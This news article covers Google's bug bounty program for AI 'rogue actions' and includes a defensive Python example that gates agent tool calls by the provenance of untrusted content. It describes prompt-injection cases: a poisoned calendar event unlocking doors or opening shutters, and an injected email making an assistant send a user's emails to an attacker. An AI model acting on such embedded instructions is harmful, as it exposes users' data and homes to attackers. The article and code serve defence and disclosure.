Google has launched a new reward program dedicated to uncovering security vulnerabilities in its artificial intelligence products, expanding its long-running bug bounty efforts into the fast-evolving world of AI safety.
The program, announced Monday, focuses on identifying “rogue actions” — situations where AI systems can be manipulated into performing unintended or harmful tasks. Google shared several examples of the types of exploits it’s targeting, such as indirect prompt injections that could trick Google Home into unlocking a door, or a data exfiltration attack that prompts an AI assistant to summarize a user’s emails and send them to an attacker’s account.
The new initiative defines what constitutes an AI-specific vulnerability, emphasizing security loopholes caused by large language models or generative AI systems. These range from modifying user data without consent to exploiting integrations with other Google services. One previously reported flaw, for instance, showed that a poisoned Google Calendar event could trigger connected smart devices to open shutters or turn off lights.
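The two rogue-action patterns above (a poisoned email or calendar entry steering an assistant into a data exfiltration or a smart-home action) share one root cause: text the assistant reads on the user's behalf gets treated as an instruction. The defender's countermeasure is to track where each tool call's instruction came from and to gate high-impact actions on that provenance. The Python below is an added example written for this article, not Google's code or any product's actual policy; the tool names, impact tiers, `example.com` user domain and sample scenarios are all assumptions constructed for illustration.

```python
from dataclasses import dataclass
from enum import Enum


class Decision(Enum):
    ALLOW = "allow"
    CONFIRM = "require_user_confirmation"
    DENY = "deny"


@dataclass(frozen=True)
class ToolCall:
    tool: str
    args: dict
    # Sources whose content influenced this call. "user" is the user's own
    # instruction; anything the assistant read on the user's behalf (email
    # bodies, calendar events, web pages) is untrusted data, not instruction.
    provenance: frozenset


# Hypothetical policy table for this example (assumed, not Google's).
HIGH_IMPACT = {"unlock_door", "open_shutters", "send_email"}
LOW_IMPACT = {"turn_off_lights", "summarize_emails", "read_calendar"}
UNTRUSTED = {"email", "calendar", "web"}


def is_external(address: str, user_domain: str) -> bool:
    """True when an email recipient is outside the user's own domain."""
    return not address.strip().lower().endswith("@" + user_domain.lower())


def evaluate(call: ToolCall, user_domain: str = "example.com") -> Decision:
    """Decide whether an agent tool call may run.

    Rules (a defender's policy, assumed for this example):
      * unknown tools are denied by default;
      * a call influenced by untrusted content ("tainted") never performs a
        high-impact action unattended, and is denied outright when it would
        also move data out of the user's trust boundary;
      * untainted high-impact calls still require explicit user confirmation;
      * tainted low-impact calls require confirmation; untainted ones run.
    """
    if call.tool not in HIGH_IMPACT and call.tool not in LOW_IMPACT:
        return Decision.DENY
    tainted = bool(call.provenance & UNTRUSTED)
    if call.tool == "send_email":
        exfil_risk = is_external(call.args.get("to", ""), user_domain)
        if tainted and exfil_risk:
            return Decision.DENY
        if tainted or exfil_risk:
            return Decision.CONFIRM
        return Decision.ALLOW
    if call.tool in HIGH_IMPACT:
        return Decision.DENY if tainted else Decision.CONFIRM
    return Decision.CONFIRM if tainted else Decision.ALLOW


def article_scenarios() -> dict:
    """The rogue-action patterns from the article, as constructed tool calls."""
    # Constructed: user asks for an email summary; an email body carries an
    # injected instruction to forward the summary to an outside address.
    exfil = ToolCall("send_email",
                     {"to": "attacker@evil.example", "body": "summary..."},
                     frozenset({"user", "email"}))
    # Constructed: a poisoned calendar event tells a home assistant to
    # unlock the door, open the shutters, or turn off the lights.
    unlock = ToolCall("unlock_door", {"door": "front"}, frozenset({"calendar"}))
    shutters = ToolCall("open_shutters", {"room": "living"}, frozenset({"calendar"}))
    lights = ToolCall("turn_off_lights", {"room": "all"}, frozenset({"calendar"}))
    # Constructed baseline: the same actions requested directly by the user.
    user_unlock = ToolCall("unlock_door", {"door": "front"}, frozenset({"user"}))
    user_lights = ToolCall("turn_off_lights", {"room": "all"}, frozenset({"user"}))
    return {
        "exfil_via_email": evaluate(exfil),
        "calendar_unlock": evaluate(unlock),
        "calendar_shutters": evaluate(shutters),
        "calendar_lights": evaluate(lights),
        "user_unlock": evaluate(user_unlock),
        "user_lights": evaluate(user_lights),
    }


if __name__ == "__main__":
    for name, decision in article_scenarios().items():
        print(f"{name:20s} -> {decision.value}")
```

The point of the provenance set is that the model's own judgement about whether a sentence in an email "looks like" an instruction is not what decides; the gate only needs to know which sources were read before the call was issued, which the orchestration layer can record deterministically. The same structure extends to other exits from the trust boundary (uploads, shared links, webhooks) by adding tools to the high-impact tier and target checks like `is_external`.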
Over the past two years, Google says AI researchers have earned more than $430,000 by helping identify ways bad actors could exploit AI features across its products. However, the company clarifies that simply getting an AI model like Gemini to hallucinate or generate incorrect information does not qualify for a reward. Instead, issues related to AI-generated content, such as hate speech or copyright violations, should be submitted via the product’s feedback channels, where Google’s AI safety teams can review them for long-term model improvements.
Alongside the new bounty program, Google also introduced CodeMender, an AI agent designed to automatically patch vulnerable code. According to the company, CodeMender has already contributed 72 security fixes to open-source projects, all reviewed and approved by human researchers.
Under the new rules, bug hunters can earn up to $20,000 for identifying rogue AI actions affecting Google’s flagship products like Search, Gemini Apps, Gmail, and Drive. Exceptional reports may qualify for bonus multipliers and novelty rewards, pushing the total to as much as $30,000. Lower rewards will be offered for vulnerabilities in smaller Google products, such as NotebookLM or Jules, or for lesser exploits like leaking secret model parameters.
By formally expanding its bug bounty scope to AI systems, Google aims to balance innovation with security, ensuring that as its generative tools grow smarter, they also remain safe from abuse.